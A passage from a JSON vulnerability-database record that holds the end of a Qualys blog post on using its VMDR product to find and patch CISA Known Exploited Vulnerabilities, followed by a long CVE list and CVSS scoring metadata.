-2021-36948`,`CVE-2021-36955`,`CVE-2021-37415`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40438`,`CVE-2021-40444`,`CVE-2021-40449`,`CVE-2021-40539`,`CVE-2021-4102`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42292`,`CVE-2021-42321`,`CVE-2021-43890`,`CVE-2021-44077`,`CVE-2021-44228`,`CVE-2021-44515`,`CVE-2022-0609`,`CVE-2022-21882`,`CVE-2022-24086`,`CVE-2010-1871`,`CVE-2017-12149`,`CVE-2019-13272` ]\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/patch-mgmt-windows2.jpg)\n\nVulnerabilities can be validated through VMDR and a Patch Job can be configured for vulnerable assets.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-6.jpg)\n\n### Federal Enterprises and Agencies Can Act Now\n\nFor federal agencies and enterprises, it\u2019s a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help your organization to achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>) to our credit.\n\nHere are a few steps Federal entities can take immediately:\n\n * Run vulnerability assessments against all of your assets by leveraging our various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Qualys Patch Management to apply patches and other configuration changes\n * Track remediation progress through our Unified Dashboards\n\n### Summary\n\nUnderstanding just which vulnerabilities exist in your environment is a critical but small part of threat mitigation. Qualys VMDR helps customers discover their exposure, assess threats, assign risk, and remediate threats \u2013 all in a single unified solution. Qualys customers rely on the accuracy of Qualys\u2019 threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any size organization efficiently respond to CISA Binding Operational Directive 22-01.\n\n#### Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-23T05:39:00", "type": "qualysblog", "title": "Managing CISA Known Exploited Vulnerabilities with Qualys VMDR", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2010-5326", "CVE-2012-0158", "CVE-2012-0391", "CVE-2012-3152", "CVE-2013-3900", "CVE-2013-3906", "CVE-2014-1761", "CVE-2014-1776", "CVE-2014-1812", "CVE-2015-1635", "CVE-2015-1641", "CVE-2015-4852", "CVE-2016-0167", "CVE-2016-0185", "CVE-2016-3088", "CVE-2016-3235", "CVE-2016-3643", "CVE-2016-3976", "CVE-2016-7255", "CVE-2016-9563", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0199", "CVE-2017-0262", "CVE-2017-0263", "CVE-2017-10271", "CVE-2017-11774", "CVE-2017-11882", "CVE-2017-12149", "CVE-2017-5638", "CVE-2017-5689", "CVE-2017-6327", "CVE-2017-7269", "CVE-2017-8464", "CVE-2017-8759", "CVE-2017-9791", "CVE-2017-9805", "CVE-2017-9841", "CVE-2018-0798", "CVE-2018-0802", "CVE-2018-1000861", "CVE-2018-11776", "CVE-2018-15961", "CVE-2018-15982", "CVE-2018-2380", "CVE-2018-4878", "CVE-2018-4939", "CVE-2018-6789", "CVE-2018-7600", "CVE-2018-8174", "CVE-2018-8453", "CVE-2018-8653", "CVE-2019-0193", "CVE-2019-0211", "CVE-2019-0541", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-0752", "CVE-2019-0797", "CVE-2019-0803", "CVE-2019-0808", "CVE-2019-0859", "CVE-2019-0863", "CVE-2019-10149", "CVE-2019-10758", "CVE-2019-11510", "CVE-2019-11539", "CVE-2019-1214", "CVE-2019-1215", "CVE-2019-13272", "CVE-2019-1367", "CVE-2019-1429", "CVE-2019-1458", "CVE-2019-16759", "CVE-2019-17026", "CVE-2019-17558", "CVE-2019-18187", "CVE-2019-18988", "CVE-2019-2725", "CVE-2019-8394", "CVE-2019-9978", "CVE-2020-0601", "CVE-2020-0646", "CVE-2020-0674", "CVE-2020-0683", "CVE-2020-0688", "CVE-2020-0787", "CVE-2020-0796", "CVE-2020-0878", "CVE-2020-0938", "CVE-2020-0968", "CVE-2020-0986", "CVE-2020-10148", "CVE-2020-10189", "CVE-2020-1020", "CVE-2020-1040", "CVE-2020-1054", "CVE-2020-1147", "CVE-2020-11738", "CVE-2020-11978", "CVE-2020-1350", "CVE-2020-13671", "CVE-2020-1380", "CVE-2020-13927", "CVE-2020-1464", "CVE-2020-1472", "CVE-2020-14750", "CVE-2020-14871", "CVE-2020-14882", "CVE-2020-14883", "CVE-2020-15505", "CVE-2020-15999", "CVE-2020-16009", "CVE-2020-16010", "CVE-2020-16013", "CVE-2020-16017", "CVE-2020-17087", "CVE-2020-17144", "CVE-2020-17496", "CVE-2020-17530", "CVE-2020-24557", "CVE-2020-25213", "CVE-2020-2555", "CVE-2020-6207", "CVE-2020-6287", "CVE-2020-6418", "CVE-2020-6572", "CVE-2020-6819", "CVE-2020-6820", "CVE-2020-8243", "CVE-2020-8260", "CVE-2020-8467", "CVE-2020-8468", "CVE-2020-8599", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-22204", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-30116", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33766", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35247", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36934", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37415", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40438", "CVE-2021-40444", "CVE-2021-40449", "CVE-2021-40539", "CVE-2021-4102", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42292", "CVE-2021-42321", "CVE-2021-43890", "CVE-2021-44077", "CVE-2021-44228", "CVE-2021-44515", "CVE-2022-0609", "CVE-2022-21882", "CVE-2022-24086"], "modified": "2022-02-23T05:39:00", "id": "QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "href": "https://blog.qualys.com/category/product-tech", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}

Several Zoho ManageEngine products have been exploited

Description

Related